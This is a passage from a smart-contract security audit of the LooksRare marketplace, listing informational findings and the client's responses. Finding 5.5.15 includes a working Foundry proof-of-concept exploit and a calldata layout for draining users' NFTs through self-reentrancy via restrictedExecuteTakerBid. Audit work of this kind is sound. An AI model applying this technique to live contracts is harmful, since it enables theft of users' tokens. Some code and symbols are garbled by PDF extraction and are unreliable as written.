336. Spearbit: Verified. +5.5.13 The owner can set the selector for a strategy to any bytes4 value Severity: Informational Context: • StrategyManager.sol#L80 • IStrategyManager.sol#L24 • ExecutionManager.sol#L124-L126 • ExecutionManager.sol#L210-L212 Description: The owner can set the selector for a strategy to any bytes4 value (as long as it's not bytes4(0)). Even though the following check exists if (!IBaseStrategy(implementation).isLooksRareV2Strategy()) { revert NotV2Strategy(); } There is no measure taken to avoid potential selector collision with other contract types. Recommendation: To avoid future potential pitfalls that could take advantage of the freedom to choose any selector value, it would be best to give strategies a more firm structure and pick a fixed selector when one would want to call them. That means removing the selector field: struct Strategy { bool isActive; uint16 standardProtocolFeeBp; uint16 minTotalFeeBp; uint16 maxProtocolFeeBp; bytes4 selector; bool isMakerBid; address implementation; IBaseStrategy implementation; - - + } Modifiy IBaseStrategy: interface IBaseStrategy { ... function executeStrategyForTakerAsk(TakerAsk takerAsk, MakerBid makerBid) external returns ( uint256 price, uint256[] itemIds, uint256[] amounts, bool isNonceInvalidated ); function executeStrategyForTakerBid(TakerBid takerBid, MakerAsk makerAsk) external returns ( uint256 price, uint256[] itemIds, uint256[] amounts, bool isNonceInvalidated ); } // or even define an abstract contract: abstract contract BaseStrategy ... { 57 ... function executeStrategyForTakerAsk(TakerAsk takerAsk, MakerBid makerBid) external virtual returns ( uint256 price, uint256[] itemIds, uint256[] amounts, bool isNonceInvalidated ) { revert(); } function executeStrategyForTakerBid(TakerBid takerBid, MakerAsk makerAsk) external virtual returns ( uint256 price, uint256[] itemIds, uint256[] amounts, bool isNonceInvalidated ) { revert(); } function isMakerBidValid( MakerBid calldata makerBid ) external view virtual returns (bool isValid) { revert(); } function isMakerAskValid( MakerAsk calldata makerAsk ) external view virtual returns (bool isValid) { revert(); } } The endpoint names can be any other name as long as one would avoid selector collision with all the other contracts involved in the protocol (LooksRareProtocol, TransferManager, wETH, IERC20, IERC721, IERC1155, IERC1271, ...). An implementation of IBaseStrategy can implement both or only one of the above endpoints (the unimplemented one can revert). Then in ExecutionManager the strategy call sites can be modified to: Transform (bool status, bytes memory data) = strategyInfo[makerBid.strategyId].implementation.call( abi.encodeWithSelector(strategyInfo[makerBid.strategyId].selector, takerAsk, makerBid) ); if (!status) { // @dev It forwards the revertion message from the low-level call assembly { revert(add(data, 32), mload(data)) } } (price, itemIds, amounts, isNonceInvalidated) = abi.decode(data, (uint256, uint256[], uint256[], bool)); to IBaseStrategy strategy = strategyInfo[makerBid.strategyId].implementation; (price, itemIds, amounts, isNonceInvalidated) = strategy.executeStrategyForTakerAsk(takerAsk, makerBid); and transform 58 (bool status, bytes memory data) = strategyInfo[makerAsk.strategyId].implementation.call( abi.encodeWithSelector(strategyInfo[makerAsk.strategyId].selector, takerBid, makerAsk) ); if (!status) { // @dev It forwards the revertion message from the low-level call assembly { revert(add(data, 32), mload(data)) } } (price, itemIds, amounts, isNonceInvalidated) = abi.decode(data, (uint256, uint256[], uint256[], bool)); to IBaseStrategy strategy = strategyInfo[makerAsk.strategyId].implementation; (price, itemIds, amounts, isNonceInvalidated) = strategy.executeStrategyForTakerBid(takerBid, makerAsk); The above has also the added benefit that less storage space would be needed since selector is removed. Note, certain strategies might need to be split into two separate strategies (StrategyCollectionOffer, Strate- gyFloorFromChainlink). Or one can combine two strategy endpoints into one by conditioning on the addition- alParameters fields. isLooksRareV2Strategy for IBaseStrategy can also be replaced by allowing IBaseStrategy to extend IERC165. Related issue: "The Protocol owner can drain users' currency tokens". LooksRare: Acknowledged but will not adjust. For strategies such as Chainlink, it greatly simplifies if multiple makerBid/makerAsk strategies exist in the same file. Spearbit: Acknowledged. +5.5.14 Constraints among the number of item ids and amounts for taker or maker bids or asks are incon- sistent among different strategies. Severity: Informational Context: • InheritedStrategy.sol#L59 • StrategyItemIdsRange.sol#L25 • StrategyDutchAuction.sol#L26 • StrategyCollectionOffer.sol • StrategyFloorFromChainlink.sol • StrategyUSDDynamicAsk.sol Description: Constraints among the number of item ids and amounts for taker or maker bids or asks are incon- sistent among different strategies. notation description Ti Ta Mi Ma length of taker's bid (or ask depending on the context) item ids length of taker's bid (or ask depending on the context) amounts length of maker's bid (or ask depending on the context) item ids length of maker's bid (or ask depending on the context) amounts 59 • IneheritedStategy : Ti = Ta = Mi = Ma • StrategyItemIdsRange : Ti (cid:20) Ta, Mi = 2, Ma = 1 (related issue) • StrategyDutchAuction : Mi (cid:20) Ti , Ma (cid:20) Ta, Mi = Ma • StrategyUSDDynamicAsk: Mi (cid:20) Ti , Ma (cid:20) Ta, Mi = Ma • StrategyFloorFromChainlink.execute...PremiumStrategyWithTakerBid : Mi (cid:20) Ti , Ma (cid:20) Ta, Mi = Ma = 1 • StrategyFloorFromChainlink.execute...DiscountCollectionOfferStrategyWithTakerAsk : Ti = 1, 1 = Ta, Ma = 1 • StrategyCollectionOffer : Ti = 1, 1 (cid:20) Ta, Ma = 1 The equalities above are explicitly enforced, but the inequalities are implicitly enforced through the compiler's out-of-bound revert. Note that in most cases (except StrategyItemIdsRange) one can enforce Ti = Ta = Mi = Ma and refactor this logic into a utility function. Recommendation: Document why the different length comparisons are not enforced or explicitly enforce the equalities. One possible reason that the equality checks have been skipped could be due to gas saving and leaving it up to the taker to provide the most compact calldata. LooksRare: TakerXxx struct have been merged into a single Taker struct that does not include itemIds or amounts. So this issue is not relavent anymore, see PR 383. Spearbit: Verified. +5.5.15 Requirements/checks for adding new transfer managers (or strategies) are really important to avoid self-reentrancy through restrictedExecuteTakerBid from unexpected call sites Severity: Informational Context: • TransferSelectorNFT.sol#L48 • LooksRareProtocol.sol#L243 • StrategyManager.sol#L71-L73 Description: When a new transfer manager gets added to the protocol, there is a check to make sure that this manager cannot be the protocol itself. This is really important as restrictedExecuteTakerBid allows the protocol itself to call this endpoint. If the check below was omitted: if ( transferManagerForAssetType == address(0) || // transferManagerForAssetType == address(this) || selectorForAssetType == bytes4(0) ) { } revert ManagerSelectorEmpty(); The owner can add the protocol itself as a transfer manager for a new asset type and pick the selector to be ILooksRareProtocol.restrictedExecuteTakerBid.selector. Then the owner along with a special address can collude and drain users' NFT tokens from an actual approved transfer manager for ERC721/ERC1155 assets. The special feature of restrictedExecuteTakerBid is that once it's called the provided parameters by the maker are not checked/verified against any signatures. The PoC below includes 2 different custom strategies for an easier setup but they are not necessary (one can use the default strategy). One creates the calldata payload and the other is called later on to select a desired NFT token id. 60 The calldata to restrictedExecuteTakerBid(...) is crafted so that the corresponding desired parameters for an actual transferManager.call can be set by itemIds; parameters offset ,! ------------------------------------------------------------------------------------------------------- c ,! 0x0000 interpreted parameters ---------- | original msg.sender, , can be changed by stuffing 0s 0000000000000000000000000000000000000000000000000000000000000080 0000000000000000000000000000000000000000000000000000000000000180 ,! 00000000000000000000000000000000000000000000000000000000000000X1 ; sender ,! 00000000000000000000000000000000000000000000000000000000000000a0 ,! msg.sender / signer ho, orderHash, 0xa0 | collection | signer / | Ta.r or | i[] ptr 0x0080 ,! to, can be changed by stuffing 0s 00000000000000000000000000000000000000000000000000000000000000X2 ; Tb.r | a[] ptr , 0x0180 00000000000000000000000000000000000000000000000000000000000000X3 ; Tb.p_max 00000000000000000000000000000000000000000000000000000000000000a0 00000000000000000000000000000000000000000000000000000000000000c0 00000000000000000000000000000000000000000000000000000000000000e0 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 from 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000X4 ; sid 00000000000000000000000000000000000000000000000000000000000000X5 ; t 0000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000X6 ; T 00000000000000000000000000000000000000000000000000000000000000X7 ; C 00000000000000000000000000000000000000000000000000000000000000X8 ; signer ,! 00000000000000000000000000000000000000000000000000000000000000X9 ; ts 00000000000000000000000000000000000000000000000000000000000000Xa ; te 0000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000001c0 00000000000000000000000000000000000000000000000000000000000001e0 0000000000000000000000000000000000000000000000000000000000000200 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 | i[].len | i[0] | i[1] | i[2] | i[3] | i[4] | i[5] | i[6] | i[7] | i[8] | i[9] | i[10] | i[11] | i[12] | i[13] , | i[14] | i[15] | i[16] | i[17] | i[18] | i[19] | i[20] | i[21] | i[22] ; T = real_collection ; C = currency ; t = assetType ; sid = strategyId ; ts = startTime ; te = endTime ; Ta = takerAsk ; Tb = takerBid // file: test/foundry/AssetAttack.t.sol pragma solidity 0.8.17; import {IStrategyManager} from "../../contracts/interfaces/IStrategyManager.sol"; import {IBaseStrategy} from "../../contracts/interfaces/IBaseStrategy.sol"; import {OrderStructs} from "../../contracts/libraries/OrderStructs.sol"; import {ProtocolBase} from "./ProtocolBase.t.sol"; import {MockERC20} from "../mock/MockERC20.sol"; 61 interface IERC1271 { function isValidSignature( bytes32 digest, bytes calldata signature ) external returns (bytes4 magicValue); } contract PayloadStrategy is IBaseStrategy { address private owner; address private collection; address private currency; uint256 private assetType; address private signer; uint256 private nextStartegyId; constructor() { owner = msg.sender; } function set( address _collection, address _currency, uint256 _assetType, address _signer, uint256 _nextStartegyId ) external { if(msg.sender != owner) revert(); collection = _collection; currency = _currency; assetType = _assetType; signer = _signer; nextStartegyId = _nextStartegyId; } function isLooksRareV2Strategy() external pure override returns (bool) { return true; } function execute( OrderStructs.TakerBid calldata /* takerBid */ , OrderStructs.MakerAsk calldata /* makerAsk */ ) external view returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) { itemIds = new uint256[](23); itemIds[0] = 0xa0; itemIds[1] = 0xc0; itemIds[2] = 0xe0; 62 itemIds[8] = nextStartegyId; itemIds[9] = assetType; itemIds[11] = uint256(uint160(collection)); itemIds[12] = uint256(uint160(currency)); itemIds[13] = uint256(uint160(signer)); itemIds[14] = 0; // startTime itemIds[15] = type(uint256).max; // endTime itemIds[17] = 0x01c0; itemIds[18] = 0x01e0; itemIds[19] = 0x0200; } } contract ItemSelectorStrategy is IBaseStrategy { address private owner; uint256 private itemId; uint256 private amount; constructor() { owner = msg.sender; } function set( uint256 _itemId, uint256 _amount ) external { if(msg.sender != owner) revert(); itemId = _itemId; amount = _amount; } function isLooksRareV2Strategy() external pure override returns (bool) { return true; } function execute( OrderStructs.TakerBid calldata /* takerBid */ , OrderStructs.MakerAsk calldata /* makerAsk */ external view returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) itemIds = new uint256[](1); itemIds[0] = itemId; amounts = new uint256[](1); amounts[0] = amount; ) { } } contract AttackTest is ProtocolBase { PayloadStrategy private payloadStrategy; 63 ItemSelectorStrategy private itemSelectorStrategy; MockERC20 private mockERC20; // // can be an arbitrary address uint256 private signingOwnerPK = 42; address private signingOwner = vm.addr(signingOwnerPK); // this address will define an offset in the calldata // and can be changed up to a certain upperbound by // stuffing calldata with 0s. address private specialUser1 = address(0x180); // NFT token recipient of the attack can also be changed // up to a certain upper bound by stuffing the calldata with 0s address private specialUser2 = address(0x3a0); // can be an arbitrary address address private victimUser = address(505); function setUp() public override { super.setUp(); vm.startPrank(_owner); { looksRareProtocol.initiateOwnershipTransfer(signingOwner); } vm.stopPrank(); vm.startPrank(signingOwner); { looksRareProtocol.confirmOwnershipTransfer(); mockERC20 = new MockERC20(); looksRareProtocol.updateCurrencyWhitelistStatus(address(mockERC20), true); looksRareProtocol.updateCreatorFeeManager(address(0)); mockERC20.mint(victimUser, 1000); mockERC721.mint(victimUser, 1); // This particular strategy is not a requirement of the exploit. // it just makes it easier payloadStrategy = new PayloadStrategy(); looksRareProtocol.addStrategy( 0, 0, 0, PayloadStrategy.execute.selector, true, address(payloadStrategy) ); itemSelectorStrategy = new ItemSelectorStrategy(); looksRareProtocol.addStrategy( 0, 0, 0, ItemSelectorStrategy.execute.selector, false, address(itemSelectorStrategy) ); } 64 vm.stopPrank(); _setUpUser(victimUser); } function testAttack() public { vm.startPrank(signingOwner); looksRareProtocol.addTransferManagerForAssetType( 2, address(looksRareProtocol), looksRareProtocol.restrictedExecuteTakerBid.selector ); payloadStrategy.set( address(mockERC721), address(mockERC20), 0, victimUser, 2 // itemSelectorStrategy ID ); itemSelectorStrategy.set(1, 1); OrderStructs.MakerBid memory makerBid = _createSingleItemMakerBidOrder({ // payloadStrategy bidNonce: 0, subsetNonce: 0, strategyId: 1, assetType: 2, // LooksRareProtocol itself orderNonce: 0, collection: address(0x80), // calldata offset currency: address(mockERC20), signer: signingOwner, maxPrice: 0, itemId: 1 }); bytes memory signature = _signMakerBid(makerBid, signingOwnerPK); OrderStructs.TakerAsk memory takerAsk; vm.stopPrank(); vm.prank(specialUser1); looksRareProtocol.executeTakerAsk( takerAsk, makerBid, signature, _EMPTY_MERKLE_TREE, _EMPTY_AFFILIATE ); assertEq(mockERC721.balanceOf(victimUser), 0); assertEq(mockERC721.ownerOf(1), specialUser2); } } Recommendation: It is important to pay extra attention when modifying the requirements for adding new transfer managers (or even strategies). If special care is not taken, a self-reentrancy for the protocol is possible that might affect the users' tokens on a trusted transfer manager (does not even need to be related to the new transfer manager or strategy added). 65 Also to avoid any future pitfall, it is recommended to not use the restrictedExecuteTakerBid and remove it from the codebase. restrictedExecuteTakerBid is only used when executing multiple taker bids for non-atomic transactions. One can instead add an extra boolean parameter to _executeTakerBid such that if true, _execute- TakerBid would revert on errors or if false it would turn into a no-op that would return a 0 amount. Or we can have two different implementations of _executeTakerBid with almost the same logic. This would avoid the external calls from the protocol to itself through restrictedExecuteTakerBid. LooksRare: Acknowledged. Spearbit: Acknowledged. +5.5.16 viewCreatorFeeInfo can be simplified Severity: Informational Context: • CreatorFeeManagerWithRebates.sol#L50-L69 • CreatorFeeManagerWithRoyalties.sol#L55-L76 Description: viewCreatorFeeInfo includes a low-level staticcall to collection's royaltyInfo endpoint and later its return status is compared and the return data is decoded. Recommendation: We can simplify viewCreatorFeeInfo and avoid the low-level call by using a try/catch block • CreatorFeeManagerWithRoyalties: for (uint256 i; i < length; ) { try IERC2981(collection).royaltyInfo(itemIds[i], price) returns ( address newCreator, uint256 newCreatorFee ) { if (i == 0) { creator = newCreator; creatorFee = newCreatorFee; unchecked { ++i; } continue; } if (newCreator != creator || newCreatorFee != creatorFee) { revert BundleEIP2981NotAllowed(collection); } } catch {} unchecked { ++i; } } • CreatorFeeManagerWithRebates: 66 for (uint256 i; i < length; ) { try IERC2981(collection).royaltyInfo(itemIds[i], price) returns ( address newCreator, uint256 /* newCreatorFee */ ) { if (i == 0) { if (newCreator == address(0)) break; creator = newCreator; unchecked { ++i; } continue; } if (newCreator != creator) { revert BundleEIP2981NotAllowed(collection); } } catch {} unchecked { ++i; } } As a bonus we get some gas optimizations: testTakerBidERC721WithRoyaltiesFromRegistry(uint256) (gas: -40 (-0.006%)) testCreatorRebatesArePaidForERC2981() (gas: -1056 (-0.162%)) testCreatorRoyaltiesGetPaidForERC2981() (gas: -1076 (-0.164%)) testCreatorRoyaltiesRevertForEIP2981WithBundlesIfInfoDiffer() (gas: -4188 (-0.424%)) testCreatorRoyaltiesGetPaidForERC2981WithBundles() (gas: -5118 (-0.474%)) testCreatorRoyaltiesRevertForEIP2981WithBundlesIfInfoDiffer() (gas: -4621 (-0.500%)) testCreatorRoyaltiesGetPaidForERC2981WithBundles() (gas: -5202 (-0.520%)) Overall gas change: -21301 (-2.250%) Note: For the above gas optimization testDutchAuction is adjusted to: - vm.assume(elapsedTime <= 3_600); + vm.assume(elapsedTime < 3_600); Since _checkValidityTimestamps returns the TOO_LATE_TO_EXECUTE_ORDER error code for the edge case of elapsedTime == 3600. LooksRare: Fixed in PR 341. Spearbit: Verified. 67 +5.5.17 _verifyMerkleProofOrOrderHash can be simplified Severity: Informational Context: • LooksRareProtocol.sol#L567 Description: _verifyMerkleProofOrOrderHash includes a if/else block that calls into _computeDigestAndVer- ify with almost the same inputs (only the hash is different). Recommendation: We can simplify _verifyMerkleProofOrOrderHash function _verifyMerkleProofOrOrderHash( OrderStructs.MerkleTree calldata merkleTree, bytes32 orderHash, bytes calldata signature, address signer ) private view { if (merkleTree.proof.length != 0) { if (!MerkleProofCalldata.verifyCalldata(merkleTree.proof, merkleTree.root, orderHash)) { revert WrongMerkleProof(); } orderHash = merkleTree.hash(); } _computeDigestAndVerify(orderHash, signature, signer); } testTakerBidMultipleOrdersSignedERC721() (gas: -3 (-0.000%)) testTakerAskMultipleOrdersSignedERC721() (gas: -3 (-0.000%)) testTakerAskERC721WithRoyaltiesFromRegistry(uint256) (gas: -40 (-0.006%)) Overall gas change: -46 (-0.006%) LooksRare: Fixed in PR 317. Spearbit: Verified. +5.5.18 isOperatorValidForTransfer can be modified to refactor more of the logic Severity: Informational Context: • TransferManager.sol#L59 • TransferManager.sol#L91 • TransferManager.sol#L133 • TransferManager.sol#L258 Description: isOperatorValidForTransfer is only used to revert if necessary. The logic around the revert decision on all call sites. Recommendation: It would be best to replace all the occurrences of the following; if (!isOperatorValidForTransfer(from, msg.sender)) { revert TransferCallerInvalid(); } with: _validateCallerForTransfer(from); where _validateCallerForTransfer is the renamed/modified isOperatorValidForTransfer: 68 function _validateCallerForTransfer(address user) internal view { if ( isOperatorWhitelisted[msg.sender] && hasUserApprovedOperator[user][msg.sender] ) { return; } revert TransferCallerInvalid(); } LooksRare: Fixed in PR 316. Spearbit: Verified. +5.5.19 Keep maximum allowed number of characters per line to 120. Severity: Informational Context: • .solhint.json Description: There are a few long lines in the code base. contracts/executionStrategies/StrategyCollectionOffer.sol 21:2 27:2 29:2 30:2 67:2 69:2 70:2 118:2 119:2 error error error error error error error error error Line length must be no more than 120 but current length is 127 Line length must be no more than 120 but current length is 163 Line length must be no more than 120 but current length is 121 Line length must be no more than 120 but current length is 121 Line length must be no more than 120 but current length is 163 Line length must be no more than 120 but current length is 121 Line length must be no more than 120 but current length is 121 Line length must be no more than 120 but current length is 123 Line length must be no more than 120 but current length is 121 max-line-length max-line-length max-line-length max-line-length max-line-length max-line-length max-line-length max-line-length max-line-length contracts/executionStrategies/StrategyDutchAuction.sol 20:2 22:2 23:2 26:5 70:31 85:2 86:2 92:5 error error error warning warning error error warning Line length must be no more than 120 but current length is 163 Line length must be no more than 120 but current length is 121 Line length must be no more than 120 but current length is 121 Function has cyclomatic complexity 9 but allowed no more than 7 Avoid to make time-based decisions in your business logic Line length must be no more than 120 but current length is 123 Line length must be no more than 120 but current length is 121 Function has cyclomatic complexity 8 but allowed no more than 7 max-line-length max-line-length max-line-length code-complexity not-rely-on-time max-line-length max-line-length code-complexity contracts/executionStrategies/StrategyItemIdsRange.sol 15:2 20:2 21:2 22:2 23:2 25:5 100:2 101:2 error error error error error warning error error Line length must be no more than 120 but current length is 142 Line length must be no more than 120 but current length is 163 Line length must be no more than 120 but current length is 163 Line length must be no more than 120 but current length is 121 Line length must be no more than 120 but current length is 121 Function has cyclomatic complexity 12 but allowed no more than 7 Line length must be no more than 120 but current length is 123 Line length must be no more than 120 but current length is 121 max-line-length max-line-length max-line-length max-line-length max-line-length code-complexity max-line-length max-line-length contracts/helpers/OrderValidatorV2A.sol 40:2 ,! 53:2 ,! error Line length must be no more than 120 but current length is 121 error Line length must be no more than 120 but current length is 121 max-line-length max-line-length 69 225:2 ,! 279:2 ,! 498:24 ,! 501:26 ,! 511:2 ,! 593:5 ,! 662:5 ,! 758:5 ,! 830:5 ,! 843:17 ,! 850:17 ,! 906:5 ,! 963:5 ,! 12:2 ,! 18:2 ,! 23:2 ,! 49:5 ,! 81:2 ,! 144:2 ,! error Line length must be no more than 120 but current length is 127 max-line-length error Line length must be no more than 120 but current length is 127 max-line-length warning Avoid to make time-based decisions in your business logic not-rely-on-time warning Avoid to make time-based decisions in your business logic not-rely-on-time error Line length must be no more than 120 but current length is 143 max-line-length warning Function has cyclomatic complexity 9 but allowed no more than 7 warning Function has cyclomatic complexity 9 but allowed no more than 7 code-complexity code-complexity warning Function order is incorrect, internal view function can not go after internal pure function (line 727) ordering warning Function has cyclomatic complexity 10 but allowed no more than 7 code-complexity warning Avoid to use inline assembly. It is acceptable only in rare cases no-inline-assembly warning Avoid to use inline assembly. It is acceptable only in rare cases warning Function has cyclomatic complexity 8 but allowed no more than 7 no-inline-assembly code-complexity warning Function has cyclomatic complexity 8 but allowed no more than 7 code-complexity contracts/helpers/ValidationCodeConstants.sol 17:2 18:2 error error Line length must be no more than 120 but current length is 129 Line length must be no more than 120 but current length is 121 max-line-length max-line-length contracts/interfaces/ILooksRareProtocol.sol 160:2 error Line length must be no more than 120 but current length is 122 max-line-length contracts/libraries/OrderStructs.sol error Line length must be no more than 120 but current length is 292 error Line length must be no more than 120 but current length is 292 max-line-length max-line-length error Line length must be no more than 120 but current length is 127 max-line-length warning Function order is incorrect, struct definition can not go after state variable declaration (line 26) ordering error Line length must be no more than 120 but current length is 128 max-line-length error Line length must be no more than 120 but current length is 131 max-line-length 49 problems (34 errors, 15 warnings) Recommendation: For better readability, it would be best to keep the maximum line widths to 120. The .sol- hint.json file can be updated to 70 @@ -1,9 +1,12 @@ { + - + + + "extends": "solhint:recommended", "rules": { "code-complexity": ["warn",7], "compiler-version": ["error", "^0.8.17"], "func-visibility": [{ "ignoreConstructors": true }], "func-visibility": ["warn", { "ignoreConstructors": true }], "func-name-mixedcase": "off", "max-line-length": ["error", 120], "ordering": "warn", "reason-string": "off", "var-name-mixedcase": "off" } The above also includes adding the rules regarding code-complexity and ordering. LooksRare: Fixed in PR 315 and PR 337. Spearbit: Verified. +5.5.20 avoid transferring in _transferFungibleTokens when sender and recipient are equal Severity: Informational Context: • LooksRareProtocol.sol#L466 • LooksRareProtocol.sol#L445-L447 • LooksRareProtocol.sol#L452 • LooksRareProtocol.sol#L510 • LooksRareProtocol.sol#L518 Description: Currently, there is no check in _transferFungibleTokens to avoid transferring funds from sender to recipient when they are equal. There is only one check outside of _transferFungibleTokens when one wants to transfer to an affiliate. But if the bidUser is the creator, or the ask recipient or the protocolFeeRecipient, the check is missing. Recommendation: It would be best to add a check in _transferFungibleTokens to avoid transferring funds when sender and recipient are equal: function _transferFungibleTokens( address currency, address sender, address recipient, uint256 amount ) internal { if (sender == recipient) return; ... } and the check for the affiliate can be removed // If currency is ETH, funds are returned to sender at the end of the execution. // If currency is ERC20, funds are not transferred from bidder to bidder (since it uses transferFrom). _transferFungibleTokens(currency, bidUser, affiliate, totalAffiliateFeeAmount); LooksRare: Although this is valid, these scenarios are not meant to happen unlike the affiliate one where it may come from future business requirements (e.g. for a market maker?) 71 Spearbit: Acknowledged. We would advise you to monitor calls where the bidUser is the creator, or the ask recipient or the protocolFeeRecipient. +5.5.21 Keep the order of parameters consistent in updateStrategy Severity: Informational Context: • StrategyManager.sol#L104-L123 Description: In updateStrategy, isActive is set first when updating storage, and it's the second parameter when supplied to the StrategyUpdated event. But it is the last parameter supplied to updateStrategy. Recommendation: For consistency, it would be best to make isActive the second parameter of updateStrategy. LooksRare: Fixed in PR 313. Spearbit: Verified. +5.5.22 _transferFungibleTokens does not check whether the amount is 0 Severity: Informational Context: • LooksRareProtocol.sol#L466 • LooksRareProtocol.sol#L446 • LooksRareProtocol.sol#L452 • LooksRareProtocol.sol#L510 • LooksRareProtocol.sol#L518 Description: _transferFungibleTokens does not check whether amount is 0 to skip transferring to recipient. For the ask recipient and creator amounts the check is performed just before calling this function. But the check is missing for the affiliate and protocol fees. Recommendation: It is recommended to include the check against 0 for the amount in _transferFungibleTokens and the checks for ask recipient and creator amounts can be removed as they would be checked in the function itself. function _transferFungibleTokens( address currency, address sender, address recipient, uint256 amount ) internal { if (amount == 0) return; ... } 72 function _transferToAskRecipientAndCreatorIfAny( address[3] memory recipients, uint256[3] memory fees, address currency, address bidUser ) private { // @dev There is no check for address(0), if the creator recipient is address(0), the fee is set to 0 _transferFungibleTokens(currency, bidUser, recipients[1], fees[1]); // @dev There is no check for address(0) since the ask recipient can never be address(0) // If ask recipient is the maker --> the signer cannot be the null address // If ask is the taker --> either it is the sender address or if the recipient (in TakerAsk) is set ,! to address(0), it is adjusted to // the original taker address _transferFungibleTokens(currency, bidUser, recipients[2], fees[2]); } LooksRare: _payProtocolFeeAndAffiliateFee has been modified to only transfer funds to the affiliate and the protocol recipient when their corresponding amounts are non-zero in PR 334. Spearbit: Verified. +5.5.23 StrategyItemIdsRange.executeStrategyWithTakerAsk - Maker's bid amount might be entirely ful- filled by a single ERC1155 item Severity: Informational Context: StrategyItemIdsRange.sol#L75 Description: StrategyItemIdsRange allows a buyer to specify a range of potential item ids (both ERC721 and ERC1155) and a desired amount, then a seller can match the buyer's request by picking a subset of items from the provided range so that the desired amount of items are eventually fulfilled. a taker might pick a single ERC1155 item id from the range and fulfill the entire order with multiple instances of that same item. Recommendation: After a short discussion with the client, we agreed that the described scenario is accepted as part of the normal behavior in the system. However, we strongly recommend informing the users about this potential edge case at the least. LooksRare: Acknowledged. Spearbit: Acknowledged. +5.5.24 Define named constants Severity: Informational Context: • ExecutionManager.sol#L289 • ExecutionManager.sol#L290 • OrderValidatorV2A.sol#L845 • OrderValidatorV2A.sol#L846 • OrderValidatorV2A.sol#L852 • OrderValidatorV2A.sol#L853 • OrderValidatorV2A.sol#L859 • InheritedStrategy.sol#L100 • InheritedStrategy.sol#L101 73 • MerkleProofCalldata.sol#L40 • MerkleProofCalldata.sol#L41 • MerkleProofCalldata.sol#L42 • MerkleProofMemory.sol#L40 • MerkleProofMemory.sol#L41 • MerkleProofMemory.sol#L42 • TransferSelectorNFT.sol#L30 • TransferSelectorNFT.sol#L31 • LooksRareProtocol.sol#L528-L530 • StrategyUSDDynamicAsk.sol#L107 assetType: • TransferManager.sol#L145 • TransferManager.sol#L152 • TransferSelectorNFT.sol#L30 • TransferSelectorNFT.sol#L31 10_000 • AffiliateManager.sol#L48 • CreatorFeeManagerWithRebates.sol#L75 • ExecutionManager.sol#L148 • ExecutionManager.sol#L155 • ExecutionManager.sol#L234 • ExecutionManager.sol#L241 • ExecutionManager.sol#L273 • StrategyFloorFromChainlink.sol#L134 • StrategyFloorFromChainlink.sol#L245 • StrategyFloorFromChainlink.sol#L249 • StrategyFloorFromChainlink.sol#L341 • OrderValidatorV2A.sol#L797 • LooksRareProtocol.sol#L439 Description: • ExecutionManager.sol#L289 : 0x7476320f is cast sig "OutsideOfTimeRange()" • TransferSelectorNFT.sol#L30 : 0xa7bc96d3 is cast sig "transferItemsERC721(address,address,address,uint256[],uint256[])" and can be replaced by TransferManager.transferItemsERC721.selector • TransferSelectorNFT.sol#L31 : 0xa0a406c6 is cast sig "transferItemsERC1155(address,address,address,uint256[],uint256[])" and can be replaced by TransferManager.transferItemsERC1155.selector. Recommendation: Replace used literals with named constants. LooksRare: Fixed in PR 300 and PR 319. Spearbit: Verified. 74 +5.5.25 price validation in executeStrategyWithTakerAsk, executeCollectionStrategyWithTakerAsk and executeCollectionStrategyWithTakerAskWithProof can be relaxed Severity: Informational Context: • StrategyCollectionOffer.sol#L32 • StrategyCollectionOffer.sol#L73 • StrategyItemIdsRange.sol#L88-L90 Description: In the above context, a maker is bidding a maximum price pmax and a taker is asking a minimum price pmin, the strategy should calculate a price p in the range [pmin, pmax ] and so we would need to have pmin (cid:20) pmax . The above strategies pick the execution price to be pmax (the maximum price bid by the maker), and since the taker is the caller to the protocol we would only need to require pmin (cid:20) pmax . But the current requirement is pmin = pmax . if ( ... || makerBid.maxPrice != takerAsk.minPrice) { revert OrderInvalid(); } Recommendation: Since the taker is the caller, we can relax the requirement for the minimum ask price to be pmin (cid:20) pmax = p, which means the if statements can be modified to if ( ... || makerBid.maxPrice < takerAsk.minPrice) { revert OrderInvalid(); } The validation does not affect the outcome which is the taker would receive the maximum bid price regardless of what minimum ask price it provides (it just needs to not be higher). LooksRare: Acknowledged. We think it is best to keep as it is. The minPrice/maxPrice should be used if the maker price fluctuates over time. Spearbit: The recommendation does not ask for the removal of those parameters, but for modifying the if state- ment. Also, the price comparisons are removed completely from these strategies due to the change to the taker structs in PR 383. +5.5.26 Change occurances of whitelist to allowlist and blacklist to blocklist Severity: Informational Context: • CurrencyManager.sol# • OrderValidatorV2A.sol • ValidationCodeConstants.sol#L8 • ICurrencyManager.sol • ITransferManager.sol • LooksRareProtocol.sol Description: In the codebase, whitelist (blacklist) is used to represent entities or objects that are allowed (denied) to be used or perform certain tasks. This word is not so accurate/suggestive and also can be offensive. Recommendation: We can replace all occurrences of whitelist with allowlist (blacklist with blocklist) which actually conveys its function more clearly. Also depending on the context whitelisted can be replaced by either added or allowed. For ref: draft-knodel-terminology-02#section-2.2. LooksRare: Fixed in PR 395. 75 Spearbit: Verified. +5.5.27 Add more documentation on expected priceFeed decimals Severity: Informational Context: StrategyUSDDynamicAsk.sol#L107 and StrategyFloorFromChainlink.sol#L370 Description: The Chainlink strategies are making the following assumptions 1. All priceFeeds in StrategyFloorFromChainlink have a decimals value of 18. 2. The priceFeed in StrategyUSDDynamicAsk has a decimals value of 8. Any priceFeed that is added that does not match these assumptions would lead to incorrect calculations. Recommendation: To make this more clear, and to make it less likely to make a mistake in the future, these as- sumptions should be documented somewhere in the code. To help further with code clarity, it is also recommended to move the hardcoded 1e8 variable into its own constant variable, e.g.: + uint256 public constant ETHUSD_PRICEFEED_DECIMALS = 8; ... - uint256 desiredSalePriceInETH = (desiredSalePriceInUSD * 1e8) / ethPriceInUSD; + uint256 desiredSalePriceInETH = (desiredSalePriceInUSD * 10 ** ETHUSD_PRICEFEED_DECIMALS) / ,! ethPriceInUSD; LooksRare: 